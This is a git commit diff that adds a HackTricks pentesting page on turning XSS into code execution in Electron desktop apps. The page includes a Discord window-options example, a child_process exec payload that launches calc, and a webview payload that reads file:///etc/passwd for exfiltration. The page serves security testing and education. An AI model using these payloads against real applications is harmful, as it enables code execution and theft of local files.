mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
GitBook: [master] one page and 2 assets modified
This commit is contained in:
parent
2c0fbb6425
commit
a140aa95ee
3 changed files with 45 additions and 1 deletions
BIN
.gitbook/assets/1-u1jdryuwaevwjmf_f2ttjg.png
Normal file
BIN
.gitbook/assets/1-u1jdryuwaevwjmf_f2ttjg.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 62 KiB |
BIN
.gitbook/assets/image (434).png
Normal file
BIN
.gitbook/assets/image (434).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 68 KiB |
|
@ -1,4 +1,48 @@
|
||||||
# XSS to RCE Electron Desktop Apps
|
# XSS to RCE Electron Desktop Apps
|
||||||
|
|
||||||
Recommended read: [https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1](https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1)
|
Recommended read for more trick: [https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1](https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1)
|
||||||
|
|
||||||
|
When I test Electron app, first I always check the options of the [BrowserWindow API](https://www.electronjs.org/docs/api/browser-window), which is used to create a browser window. By checking it, I think about how RCE can be achieved when arbitrary JavaScript execution on the renderer is possible.
|
||||||
|
Example:
|
||||||
|
|
||||||
|
```text
|
||||||
|
const mainWindowOptions = {
|
||||||
|
title: 'Discord',
|
||||||
|
backgroundColor: getBackgroundColor(),
|
||||||
|
width: DEFAULT_WIDTH,
|
||||||
|
height: DEFAULT_HEIGHT,
|
||||||
|
minWidth: MIN_WIDTH,
|
||||||
|
minHeight: MIN_HEIGHT,
|
||||||
|
transparent: false,
|
||||||
|
frame: false,
|
||||||
|
resizable: true,
|
||||||
|
show: isVisible,
|
||||||
|
webPreferences: {
|
||||||
|
blinkFeatures: 'EnumerateDevices,AudioOutputDevices',
|
||||||
|
nodeIntegration: false,
|
||||||
|
preload: _path2.default.join(__dirname, 'mainScreenPreload.js'),
|
||||||
|
nativeWindowOpen: true,
|
||||||
|
enableRemoteModule: false,
|
||||||
|
spellcheck: true
|
||||||
|
}
|
||||||
|
};
|
||||||
|
```
|
||||||
|
|
||||||
|
## nodeIntgration RCE
|
||||||
|
|
||||||
|
If the nodeIntegration is set to true, a web page's JavaScript can use Node.js features easily just by calling the `require()`. For example, the way to execute the calc application on Windows is:
|
||||||
|
|
||||||
|
```text
|
||||||
|
<script>
|
||||||
|
require('child_process').exec('calc');
|
||||||
|
</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Read Arbitrary Internal FIle
|
||||||
|
|
||||||
|
If contextIsolation set to false you can try to use <webview> \(similar to <iframe> butcan load local files\) to read local files and exfiltrate them: using something like **<webview src=”file:///etc/passwd”></webview>:**
|
||||||
|
|
||||||
|
![](../../.gitbook/assets/1-u1jdryuwaevwjmf_f2ttjg.png)
|
||||||
|
|
||||||
|
**\(Trick copied form** [**here**](https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d)**\).**
|
||||||
|
|
||||||
|
|
Loading…
Reference in a new issue